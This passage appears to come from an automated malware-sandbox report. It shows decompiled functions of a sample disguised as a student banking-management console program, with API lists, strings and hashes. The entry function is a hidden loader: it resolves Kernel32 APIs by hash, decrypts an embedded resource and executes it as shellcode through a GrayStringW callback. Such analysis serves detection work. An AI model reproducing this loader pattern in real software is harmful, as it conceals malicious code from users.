				while(_v8 < 5) {
					_t221 = strlen(_t350 + _v8 * 0x1e - 0x140);
					_t354 = _t354 + 4;
					_v96 = _t221;
					if(_v96 != 0) {
						_v68 = _v8;
						if(_v68 <= 4) {
							switch( *((intOrPtr*)(_v68 * 4 +  &M00231E38))) {
								case 0:
									strcpy( &_v44, "Kharab ");
									_t354 = _t354 + 8;
									goto L32;
								case 1:
									strcpy( &_v44, "Arab ");
									goto L32;
								case 2:
									strcpy( &_v44, "Crore ");
									goto L32;
								case 3:
									__ecx =  &_v44;
									strcpy( &_v44, "Lakh ");
									goto L32;
								case 4:
									strcpy( &_v44, "Thousand ");
									goto L32;
							}
						}
						L32:
						strcat( &_v172, _t350 + _v8 * 0x1e - 0x140);
						strcat( &_v172,  &_v44);
						_t354 = _t354 + 0x10;
					}
					_v8 = _v8 + 1;
				}
				strcpy(_a12,  &_v172);
				strcat(_a12,  &_v64);
				_t218 = strlen(_a12);
				_a12[_t218 - 1] = 0;
				return _t218;
			}

APIs

memset.MSVCRT ref: 00231A63
strcpy.MSVCRT(00000000,?,00000000,?), ref: 00231B3A
strcat.MSVCRT(00000000,Hundred ,00000000,?), ref: 00231B4B
strcat.MSVCRT(00000000,?,00000014,?,?,?,00000000,?), ref: 00231B68
strcpy.MSVCRT(00000000,?,00000014,?), ref: 00231B96
strcpy.MSVCRT(00000000,?,00000000,?), ref: 00231BC4
strcat.MSVCRT(00000000,Hundred ,00000000,?), ref: 00231BD5
strcat.MSVCRT(00000000,?,?,?,?,?,00000000,?), ref: 00231BF2
strcat.MSVCRT(00000000,?,?,?,?,?,?,?,00000000,?), ref: 00231C0F
strcpy.MSVCRT(00000000,?,?,?), ref: 00231C2E
strcat.MSVCRT(00000000,?,?,?,?,?), ref: 00231C4B
strcpy.MSVCRT(?,?,00000014,?,?,?,00000014,?,?,?,?,?), ref: 00231C9C
strcpy.MSVCRT(?,?,00000014,?,?,?,?,?), ref: 00231CD1
strcat.MSVCRT(?,?,?,?,00000014,?,?,?,?,?), ref: 00231D04
strlen.MSVCRT ref: 00231D3B
strcpy.MSVCRT(00000000,Kharab ,?,?,?,?,?,?), ref: 00231D6F
strcpy.MSVCRT(00000000,Arab ,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00231D82
strcpy.MSVCRT(00000000,Crore ,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00231D95
strcat.MSVCRT(00000000,?,?,?,?,?,?,?), ref: 00231DD8
strcat.MSVCRT(00000000,00000000,?,?,?,?,?,?,?,?), ref: 00231DEB
strcpy.MSVCRT(?,00000000,?,?,?,?), ref: 00231E03
strcat.MSVCRT(?,00000000,?,?,?,?,?,?), ref: 00231E13
strlen.MSVCRT ref: 00231E1F

Strings

Crore , xrefs: 00231D8C
Kharab , xrefs: 00231D66
Lakh , xrefs: 00231D9F
Arab , xrefs: 00231D79
Hundred , xrefs: 00231BCC
Hundred , xrefs: 00231B42
Thousand , xrefs: 00231DB2

Memory Dump Source

Source File: 00000001.00000002.285655278.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000001.00000002.285626033.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285695754.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285710988.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.285718516.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: strcatstrcpy$strlen$memset
String ID: Arab $Crore $Hundred $Hundred $Kharab $Lakh $Thousand
API String ID: 2193452661-1289526402
Opcode ID: 2a8c9278a84700d3723d4958020551a0715560e3458e094508ae2d7535135e5b
Instruction ID: ab1118c4df7ffac0032056192c33e6daf0c7977ae3c2858a1fff144cc57f1b42
Opcode Fuzzy Hash: 2a8c9278a84700d3723d4958020551a0715560e3458e094508ae2d7535135e5b
Instruction Fuzzy Hash: 37D184F1D20208EBCF08DFE8D885ADDB7B9AF59300F148929F505A7240EB759A65CF61

Uniqueness

Uniqueness Score: -1.00%

Function 002323F0, Relevance: 26.3, APIs: 9, Strings: 6, Instructions: 67
stringCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E002323F0(void* __ecx, long long __fp0) {
				intOrPtr _v8;
				int _t9;
				intOrPtr _t14;
				void* _t19;
				void* _t21;
				void* _t22;
				void* _t26;
				long long _t31;

				_t31 = __fp0;
				E002310D0(0, 0, 0x50, 0x17);
				E00231000(0x19, 1);
				printf("Banking Management //");
				E00231000(5, 3);
				_t9 = strcmp(0x23b244, "Admin");
				_t21 = _t19 + 0xc;
				if(_t9 == 0) {
					 *0x23b220 = 1;
				}
				if( *0x23b220 == 0) {
					_push(0x23b244);
					printf("Current User : %s");
					_t22 = _t21 + 8;
				} else {
					printf("Current User : Admin");
					_t22 = _t21 + 4;
				}
				printf("\t\t\t\tDate : ");
				__imp___strdate(0x23b2a0);
				E00231410(_t31, 0x23b2a0);
				printf("%s");
				__imp___strdate(0x23b2a0, 0x23b2a0);
				_t26 = _t22 + 0x14;
				_t14 = E00231000(1, 5);
				_v8 = 0;
				while(_v8 < 0x4e) {
					_push(0xc4);
					printf("%c");
					_t26 = _t26 + 8;
					_t14 = _v8 + 1;
					_v8 = _t14;
				}
				return _t14;
			}

APIs

Part of subcall function 002310D0: printf.MSVCRT ref: 002310ED
Part of subcall function 002310D0: printf.MSVCRT ref: 0023112C
Part of subcall function 002310D0: printf.MSVCRT ref: 0023114E
Part of subcall function 002310D0: printf.MSVCRT ref: 002311C3
Part of subcall function 002310D0: printf.MSVCRT ref: 002311E7

Part of subcall function 00231000: GetStdHandle.KERNEL32(000000F5,00000000,?,002310E3,?,?,?,00237B25), ref: 00231021
Part of subcall function 00231000: SetConsoleCursorPosition.KERNEL32(00000000,?,002310E3,?,?,?,00237B25), ref: 00231028

printf.MSVCRT ref: 0023240F
strcmp.MSVCRT ref: 0023242B
printf.MSVCRT ref: 0023244F
printf.MSVCRT ref: 00232464
printf.MSVCRT ref: 00232472
_strdate.MSVCRT ref: 00232480
printf.MSVCRT ref: 0023249D
_strdate.MSVCRT ref: 002324AB
printf.MSVCRT ref: 002324DF

Strings

Admin, xrefs: 00232421
Current User : %s, xrefs: 0023245F
Banking Management //, xrefs: 0023240A
Date : , xrefs: 0023246D
N, xrefs: 002324CF
Current User : Admin, xrefs: 0023244A

Memory Dump Source

Source File: 00000001.00000002.285655278.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000001.00000002.285626033.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285695754.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285710988.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.285718516.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: printf$_strdate$ConsoleCursorHandlePositionstrcmp
String ID: Date : $Admin$Banking Management //$Current User : %s$Current User : Admin$N
API String ID: 1102874408-644830535
Opcode ID: 3b0522a478674ed8553711788fe5bee56d2175e7f613fde9e8090821c43393dd
Instruction ID: 88131636abc9a106cb5d1d2dea3fde29dffa7792bf2ff3ad5c3b6d47d11f98d5
Opcode Fuzzy Hash: 3b0522a478674ed8553711788fe5bee56d2175e7f613fde9e8090821c43393dd
Instruction Fuzzy Hash: E71133F07B0304FBE6146B64BD0FB5A36206B12B0AF154120FF4AB91D1DAE165789967

Uniqueness

Uniqueness Score: -1.00%

Function 00232070, Relevance: 25.6, APIs: 9, Strings: 8, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00232070(void* __ecx, signed int _a4, char* _a8) {
				signed int _v8;

				_v8 = _a4;
				_v8 = _v8 - 2;
				if(_v8 > 7) {
					return strcpy(_a8, 0x23b224);
				}
				switch( *((intOrPtr*)(_v8 * 4 +  &M0023214C))) {
					case 0:
						return strcpy(_a8, "Twenty ");
					case 1:
						__ecx = _a8;
						return strcpy(_a8, "Thirty ");
					case 2:
						return strcpy(_a8, "Forty ");
					case 3:
						__eax = _a8;
						return strcpy(_a8, "Fifty ");
					case 4:
						__ecx = _a8;
						return strcpy(_a8, "Sixty ");
					case 5:
						return strcpy(_a8, "Seventy ");
					case 6:
						__eax = _a8;
						return strcpy(_a8, "Eighty ");
					case 7:
						__ecx = _a8;
						return strcpy(_a8, "Ninety ");
				}
			}

APIs

strcpy.MSVCRT(00231C26,Twenty ,?,?,00231C26,?), ref: 002320A0
strcpy.MSVCRT(?,Thirty ), ref: 002320B6
strcpy.MSVCRT(?,Forty ), ref: 002320CC
strcpy.MSVCRT(?,Fifty ), ref: 002320DF
strcpy.MSVCRT(?,Sixty ), ref: 002320F2
strcpy.MSVCRT(?,Seventy ), ref: 00232105
strcpy.MSVCRT(?,Eighty ), ref: 00232118
strcpy.MSVCRT(?,Ninety ), ref: 0023212B
strcpy.MSVCRT(00231C26,0023B224,?,?,00231C26,?), ref: 0023213E

Strings

Eighty , xrefs: 0023210F
Twenty , xrefs: 00232097
Fifty , xrefs: 002320D6
Forty , xrefs: 002320C3
Ninety , xrefs: 00232122
Seventy , xrefs: 002320FC
Sixty , xrefs: 002320E9
Thirty , xrefs: 002320AD

Memory Dump Source

Source File: 00000001.00000002.285655278.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000001.00000002.285626033.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285695754.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285710988.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.285718516.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: strcpy
String ID: Eighty $Fifty $Forty $Ninety $Seventy $Sixty $Thirty $Twenty
API String ID: 3177657795-170854734
Opcode ID: 24b64d696e3f7aded3b3afb5cb439e4091a81643eefeedcf47f7379c41256812
Instruction ID: cd0a6a78eafc7ff01f3de54390054b3a40a4acbafeeb5a4ceca56103633f4893
Opcode Fuzzy Hash: 24b64d696e3f7aded3b3afb5cb439e4091a81643eefeedcf47f7379c41256812
Instruction Fuzzy Hash: 3F1130F5F38204F7CA28DE90DDC295D33366B56700F148A25BA8D1B351E5729A38DB92

Uniqueness

Uniqueness Score: -1.00%

Function 002324F0, Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E002324F0(void* __ecx) {
				intOrPtr _v8;
				void* _t31;
				void* _t32;
				void* _t33;

				E002310D0(0, 0, 0x50, 0x17);
				E00231000(0x1b, 4);
				printf("BANK MANAGEMENT //");
				_t32 = _t31 + 4;
				E00231000(0x19, 5);
				_v8 = 0;
				while(_v8 < 0x1b) {
					_push(0xc4);
					printf("%c");
					_t32 = _t32 + 8;
					_v8 = _v8 + 1;
				}
				E00231000(0x19, 8);
				printf("Designed and Programmed by:");
				_t33 = _t32 + 4;
				E00231000(0x19, 9);
				_v8 = 0;
				while(_v8 < 0x1b) {
					_push(0xc4);
					printf("%c");
					_t33 = _t33 + 8;
					_v8 = _v8 + 1;
				}
				E00231000(0x21, 0xb);
				printf("Ravi Agrawal");
				E00231000(0x21, 0xd);
				printf("Sagar Sharma");
				E00231000(0x21, 0xf);
				printf("Sawal Maskey");
				E00231000(0x18, 0x14);
				return printf("Press Any key to continue...");
			}

APIs

Part of subcall function 002310D0: printf.MSVCRT ref: 002310ED
Part of subcall function 002310D0: printf.MSVCRT ref: 0023112C
Part of subcall function 002310D0: printf.MSVCRT ref: 0023114E
Part of subcall function 002310D0: printf.MSVCRT ref: 002311C3
Part of subcall function 002310D0: printf.MSVCRT ref: 002311E7

Part of subcall function 00231000: GetStdHandle.KERNEL32(000000F5,00000000,?,002310E3,?,?,?,00237B25), ref: 00231021
Part of subcall function 00231000: SetConsoleCursorPosition.KERNEL32(00000000,?,002310E3,?,?,?,00237B25), ref: 00231028

printf.MSVCRT ref: 0023250F
printf.MSVCRT ref: 00232543
printf.MSVCRT ref: 0023255C
printf.MSVCRT ref: 00232590
printf.MSVCRT ref: 002325A9
printf.MSVCRT ref: 002325C0
printf.MSVCRT ref: 002325D7
printf.MSVCRT ref: 002325EE

Strings

Sawal Maskey, xrefs: 002325D2
Press Any key to continue..., xrefs: 002325E9
Designed and Programmed by:, xrefs: 00232557
BANK MANAGEMENT //, xrefs: 0023250A
Sagar Sharma, xrefs: 002325BB
Ravi Agrawal, xrefs: 002325A4

Memory Dump Source

Source File: 00000001.00000002.285655278.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000001.00000002.285626033.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285695754.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285710988.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.285718516.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: printf$ConsoleCursorHandlePosition
String ID: BANK MANAGEMENT //$Designed and Programmed by:$Press Any key to continue...$Ravi Agrawal$Sagar Sharma$Sawal Maskey
API String ID: 748348440-2888666035
Opcode ID: 3caf44f97510a1c1efa81f0e2d9c72e38980ce73528fe7bd0997c1a73bc438c7
Instruction ID: 6db7f38e119e0665025f3a54f1d92b48ba697a8c5d38067d30c4dbfb6fd33733
Opcode Fuzzy Hash: 3caf44f97510a1c1efa81f0e2d9c72e38980ce73528fe7bd0997c1a73bc438c7
Instruction Fuzzy Hash: 6B2145F06A0304FBF618A7A4BE1BF5975306F11B4AF140010F7067D1D2D9F216B86997

Uniqueness

Uniqueness Score: -1.00%

Function 002341D0, Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 208
filestringCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E002341D0(long long __fp0) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				long long _v44;
				intOrPtr _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v62;
				char _v82;
				char _v132;
				char _v133;
				char _v145;
				char _v160;
				char _v190;
				char _v220;
				char _v228;
				struct _IO_FILE* _t73;
				struct _IO_FILE* _t74;
				struct _IO_FILE* _t79;
				int _t80;
				struct _IO_FILE* _t108;
				struct _IO_FILE* _t115;
				struct _IO_FILE* _t149;
				void* _t176;
				void* _t177;
				void* _t178;
				void* _t179;
				void* _t180;
				long long _t194;

				_t194 = __fp0;
				_t73 = fopen("ACCOUNT.DAT", "r");
				_t178 = _t177 + 8;
				 *0x23b288 = _t73;
				if( *0x23b288 != 0) {
					_t74 = fopen("TEMP.DAT", "w");
					_t179 = _t178 + 8;
					 *0x23b284 = _t74;
					_v48 = 0;
					while(1) {
						_t79 =  *0x23b288; // 0x0
						_t80 = fscanf(_t79, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v228,  &_v220,  &_v190,  &_v145,  &_v132,  &_v82,  &_v133,  &_v160,  &_v62,  &_v60,  &_v56,  &_v52);
						_t180 = _t179 + 0x38;
						if(_t80 == 0xffffffff) {
							break;
						}
						_v16 = ( *0x0023B2A6 - 0x30) * 0xa +  *0x0023B2A7 - 0x30;
						_v8 = ( *0x0023B2A0 - 0x30) * 0xa +  *0x00DE8E4D - 0x30;
						_v12 = ( *0x0023B2A3 - 0x30) * 0xa +  *((char*)(0xde8e4d)) - 0x30;
						_v24 = _v8 * 0x1e + _v16 * 0x16d + _v12;
						_v16 = ( *((char*)(_t176 + 0xffffffffffffff6a)) - 0x30) * 0xa +  *((char*)(_t176 + 0xffffffffffffff6b)) - 0x30;
						_v8 = ( *((char*)(_t176 + 0xffffffffffffff64)) - 0x30) * 0xa +  *((char*)(_t176 + 0xbadb11)) - 0x30;
						_v12 = ( *((char*)(_t176 + 0xffffffffffffff67)) - 0x30) * 0xa +  *((char*)(_t176 + 0xbadb11)) - 0x30;
						_v28 = _v8 * 0x1e + _v16 * 0x16d + _v12;
						if(_v62 == 0x53 || _v62 == 0x73) {
							asm("movss xmm0, [0x238118]");
							asm("movss [ebp-0x10], xmm0");
						} else {
							asm("movss xmm0, [0x238114]");
							asm("movss [ebp-0x10], xmm0");
						}
						asm("cvtss2sd xmm0, [ebp-0x38]");
						asm("cvtsi2sd xmm1, ecx");
						asm("movsd [esp], xmm1");
						asm("movss xmm1, [ebp-0x10]");
						asm("divss xmm1, [0x238130]");
						asm("addss xmm1, [0x23811c]");
						asm("cvtss2sd xmm1, xmm1");
						asm("movsd [esp], xmm1");
						asm("movsd [ebp-0x20], xmm0");
						L00237C82();
						_v44 = _t194;
						asm("movsd xmm0, [ebp-0x20]");
						asm("mulsd xmm0, [ebp-0x28]");
						asm("cvtsd2ss xmm0, xmm0");
						asm("movss [ebp-0x30], xmm0");
						asm("movss xmm0, [ebp-0x30]");
						asm("subss xmm0, [ebp-0x38]");
						asm("addss xmm0, [ebp-0x34]");
						asm("movss [ebp-0x34], xmm0");
						asm("movss xmm0, [ebp-0x38]");
						asm("addss xmm0, [ebp-0x34]");
						asm("movss [ebp-0x30], xmm0");
						strcpy( &_v160, 0x23b2a0);
						asm("cvtss2sd xmm0, [ebp-0x30]");
						asm("movsd [esp], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x34]");
						asm("movsd [esp], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x38]");
						asm("movsd [esp], xmm0");
						_push(_v62);
						_push( &_v160);
						_push(_v133);
						_push( &_v82);
						_push( &_v132);
						_push( &_v145);
						_push( &_v190);
						_push( &_v220);
						_push( &_v228);
						_t108 =  *0x23b284; // 0x0
						fprintf(_t108, "%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f\n");
						_t179 = _t180 + 0x18 - 0xfffffffffffffff8 + 0x44;
					}
					_t115 =  *0x23b288; // 0x0
					fclose(_t115);
					_t149 =  *0x23b284; // 0x0
					return fclose(_t149);
				}
				return _t73;
			}

APIs

fopen.MSVCRT ref: 002341E3
fopen.MSVCRT ref: 00234208
fscanf.MSVCRT ref: 0023426A
pow.MSVCRT ref: 0023441D
strcpy.MSVCRT(?,0023B2A0), ref: 0023446A
fprintf.MSVCRT ref: 002344DC
fclose.MSVCRT ref: 002344F1
fclose.MSVCRT ref: 00234501

Strings

%s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 0023425F
TEMP.DAT, xrefs: 00234203
%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f, xrefs: 002344D1
ACCOUNT.DAT, xrefs: 002341DE

Memory Dump Source

Source File: 00000001.00000002.285655278.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000001.00000002.285626033.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285695754.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285710988.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.285718516.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: fclosefopen$fprintffscanfstrcpy
String ID: %s %s %s %s %s %s %c %s %c %.2f %.2f %.2f$%s %s %s %s %s %s %c %s %c %f %f %f$ACCOUNT.DAT$TEMP.DAT
API String ID: 1564360689-2055742014
Opcode ID: b7db24d4190e68885c61c4f77d110ba80e41ef7dc1cc0c32f164d24ff8bb1194
Instruction ID: 5a0998efffd8e5a1c0956ddd313288336386781e6a493220c8b45bfa7f2f6be0
Opcode Fuzzy Hash: b7db24d4190e68885c61c4f77d110ba80e41ef7dc1cc0c32f164d24ff8bb1194
Instruction Fuzzy Hash: 4B91D271C105499FCB09CFA8E995AEEFB7AFF45300F04826AE106BA191EB745685CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00237970, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 173
stringCOMMON

Download Yara Rule

C-Code - Quality: 57%

			_entry_(void* __ecx, void* __eflags, void* __fp0) {
				signed int _v5;
				signed int _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v36;
				char _v40;
				void* _v1040;
				_Unknown_base(*)() _v7704;
				void* _t161;
				void* _t162;
				void* _t163;
				void* _t168;

				_t168 = __fp0;
				_t120 = __ecx;
				E00237C90(0x1e14, __ecx);
				_v16 = GetModuleHandleW(L"Kernel32.dll");
				E00237910(_t120);
				_v36 = E00237800(_v16, 0x69a1ad6);
				_v20 = E00237800(_v16, 0x9c857be);
				_v24 = E00237800(_v16, 0x93b3503e);
				_v28 = _v36(0, L"IEUCIZEO", 0xa);
				_v32 = _v20(0, _v28);
				memcpy( &_v7704, _v32, 0x1a05);
				_t163 = _t162 + 0xc;
				_v12 = 0;
				while(_v12 < 0x1a05) {
					_v5 =  *((intOrPtr*)(_t161 + _v12 - 0x1e14));
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 = (_v5 & 0x000000ff) >> 0x00000005 | (_v5 & 0x000000ff) << 0x00000003;
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 = (_v5 & 0x000000ff) >> 0x00000005 | (_v5 & 0x000000ff) << 0x00000003;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + 9;
					_v5 = _v5 & 0x000000ff ^ 0x00000026;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + _v12;
					 *((char*)(_t161 + _v12 - 0x1e14)) = _v5;
					_v12 = _v12 + 1;
				}
				_v24( &_v7704, 0x1a05, 0x40,  &_v40);
				GrayStringW(GetDC(0), 0,  &_v7704,  &_v1040, 0, 0, 0, 0, 0);
				E002324F0( &_v1040);
				while(1) {
					E002310D0(8, 9, 0x46, 0xd);
					E00231000(0xa, 0xb);
					printf("Press A to Log in as ADMINISTRATOR or S to log in as STAFF\n\n\n\t\t\t\t\t");
					_t163 = _t163 + 4;
					if((_v5 & 0x000000ff) == 0x41 || (_v5 & 0x000000ff) == 0x61) {
						break;
					}
					if((_v5 & 0x000000ff) == 0x53 || (_v5 & 0x000000ff) == 0x73) {
						E00233C70(_t168);
					} else {
						if((_v5 & 0x000000ff) == 0x1b) {
							exit(0);
						}
						if(1 != 0) {
							continue;
						}
					}
					L14:
					return 0;
				}
				strcpy(0x23b244, "Admin");
				E00232600(_t168);
				goto L14;
			}

APIs

GetModuleHandleW.KERNEL32(Kernel32.dll), ref: 00237982

Part of subcall function 00237910: GetProcessHeap.KERNEL32(00000001,17D78400,?,?,?,00237990), ref: 0023791C
Part of subcall function 00237910: HeapAlloc.KERNEL32(00000000,?,?,?,00237990), ref: 00237923
Part of subcall function 00237910: GetProcessHeap.KERNEL32(00000001,00000000,00000000,17D78400,?,?,?,00237990), ref: 0023795D
Part of subcall function 00237910: HeapAlloc.KERNEL32(00000000,?,?,?,00237990), ref: 00237964

memcpy.MSVCRT ref: 002379EE
GetDC.USER32 ref: 00237B13
GrayStringW.USER32(00000000), ref: 00237B1A
printf.MSVCRT ref: 00237B40
strcpy.MSVCRT(0023B244,Admin), ref: 00237B65
exit.MSVCRT ref: 00237B98

Strings

IEUCIZEO, xrefs: 002379C5
Kernel32.dll, xrefs: 0023797D
Admin, xrefs: 00237B5B
Press A to Log in as ADMINISTRATOR or S to log in as STAFF, xrefs: 00237B3B

Memory Dump Source

Source File: 00000001.00000002.285655278.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000001.00000002.285626033.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285695754.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285710988.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.285718516.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocProcess$GrayHandleModuleStringexitmemcpyprintfstrcpy
String ID: Admin$IEUCIZEO$Kernel32.dll$Press A to Log in as ADMINISTRATOR or S to log in as STAFF
API String ID: 2725018596-105592271
Opcode ID: 0f840de78907915976156dfbe8396d55091ed1cee43d475eaee2e644cd221dc3
Instruction ID: e18e0629f4a73268500404ee69e31d1785b75d746b706325a4aa28fbac12ff1f
Opcode Fuzzy Hash: 0f840de78907915976156dfbe8396d55091ed1cee43d475eaee2e644cd221dc3
Instruction Fuzzy Hash: CF617BB0D5C3D8BACF11CBE48891BEDBFB19F5A301F0880C5F59166282C6764759CB21

Uniqueness

Uniqueness Score: -1.00%

Function 00231730, Relevance: 10.7, APIs: 4, Strings: 3, Instructions: 240
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00231730(signed int __eax, char* _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v76;
				signed char _t207;
				char* _t264;
				void* _t337;
				void* _t338;

				asm("cvttss2si eax, [ebp+0xc]");
				_v16 = __eax;
				asm("cdq");
				 *(_t337 + 0xffffffffffffffec) = _v16 % 0x3e8;
				asm("cdq");
				_v16 = _v16 / 0x3e8;
				_v12 = 4;
				while(_v12 >= 0) {
					asm("cdq");
					 *(_t337 + _v12 * 4 - 0x28) = _v16 % 0x64;
					asm("cdq");
					_v16 = _v16 / 0x64;
					_v12 = _v12 - 1;
				}
				_v12 = 0;
				while(_v12 < 6) {
					if( *(_t337 + _v12 * 4 - 0x28) == 0) {
						_v12 = _v12 + 1;
						continue;
					} else {
					}
					break;
				}
				_v20 = _v12;
				_v8 = 0;
				_v12 = _v20;
				while(_v12 < 6) {
					if(_v12 != 5) {
						if( *(_t337 + _v12 * 4 - 0x28) >= 0xa || _v12 != _v20) {
							asm("cdq");
							_a4[_v8] =  *(_t337 + _v12 * 4 - 0x28) / 0xa + 0x30;
							_v8 = _v8 + 1;
						}
						asm("cdq");
						_a4[_v8] =  *(_t337 + _v12 * 4 - 0x28) % 0xa + 0x30;
						_v8 = _v8 + 1;
						_a4[_v8] = 0x2c;
						_v8 = _v8 + 1;
					} else {
						if( *(_t337 + _v12 * 4 - 0x28) >= 0x64 || _v12 != _v20) {
							asm("cdq");
							_a4[_v8] =  *(_t337 + _v12 * 4 - 0x28) / 0x64 + 0x30;
							_v8 = _v8 + 1;
						}
						asm("cdq");
						if( *(_t337 + _v12 * 4 - 0x28) % 0x64 >= 0xa || _v12 != _v20) {
							asm("cdq");
							asm("cdq");
							_a4[_v8] =  *(_t337 + _v12 * 4 - 0x28) % 0x64 / 0xa + 0x30;
							_v8 = _v8 + 1;
						}
						asm("cdq");
						if( *(_t337 + _v12 * 4 - 0x28) % 0x64 < 0xa && _v12 == _v20) {
							_a4[_v8] = 0x30;
							_v8 = _v8 + 1;
						}
						asm("cdq");
						asm("cdq");
						_a4[_v8] =  *(_t337 + _v12 * 4 - 0x28) % 0x64 % 0xa + 0x30;
						_v8 = _v8 + 1;
					}
					_v12 = _v12 + 1;
				}
				_t264 =  &(_a4[_v8]);
				 *_t264 = 0x2e;
				_v8 = _v8 + 1;
				asm("cvttss2si eax, [ebp+0xc]");
				asm("cvtsi2ss xmm0, eax");
				asm("movss xmm1, [ebp+0xc]");
				asm("subss xmm1, xmm0");
				asm("mulss xmm1, [0x238130]");
				asm("cvttss2si ecx, xmm1");
				_v16 = _t264;
				asm("cdq");
				_a4[_v8] = _v16 / 0xa + 0x30;
				_v8 = _v8 + 1;
				asm("cdq");
				_t207 =  &(_a4[_v8]);
				 *_t207 = _v16 % 0xa + 0x30;
				_v8 = _v8 + 1;
				_a4[_v8] = 0;
				asm("movss xmm0, [ebp+0xc]");
				asm("ucomiss xmm0, [0x238110]");
				asm("lahf");
				if((_t207 & 0x00000044) == 0) {
					strcpy(_a4, "0.00");
					_t338 = _t338 + 8;
				}
				strcpy( &_v76, "Rs. ");
				strcat( &_v76, _a4);
				return strcpy(_a4,  &_v76);
			}

Strings

d, xrefs: 002317F8
0.00, xrefs: 002319CB
Rs. , xrefs: 002319DC

Memory Dump Source

Source File: 00000001.00000002.285655278.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000001.00000002.285626033.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285695754.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285710988.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.285718516.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 0.00$Rs. $d
API String ID: 0-3201609306
Opcode ID: 5d6b562fe741ad8958638b27d14048e56bebc83429c9a2da2dd3030485bc986d
Instruction ID: 0bdac43c7cfdb83227fced2b021a9168d597d8d568f85bb443df7557d91c004c
Opcode Fuzzy Hash: 5d6b562fe741ad8958638b27d14048e56bebc83429c9a2da2dd3030485bc986d
Instruction Fuzzy Hash: EEA13CB4E11208EFDB05CF98C581B9CBBB2FF89314F248599E505AB390C734AEA1DB55

Uniqueness

Uniqueness Score: -1.00%

Function 002310D0, Relevance: 10.6, APIs: 7, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E002310D0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;

				E00231000(_a4, _a8);
				_push(0xc9);
				printf("%c");
				_t101 = _t100 + 8;
				_v8 = _a4 + 1;
				while(_v8 < _a12 - 1) {
					E00231000(_v8, _a8);
					_push(0xcd);
					printf("%c");
					_t101 = _t101 + 8;
					_v8 = _v8 + 1;
				}
				E00231000(_v8, _a8);
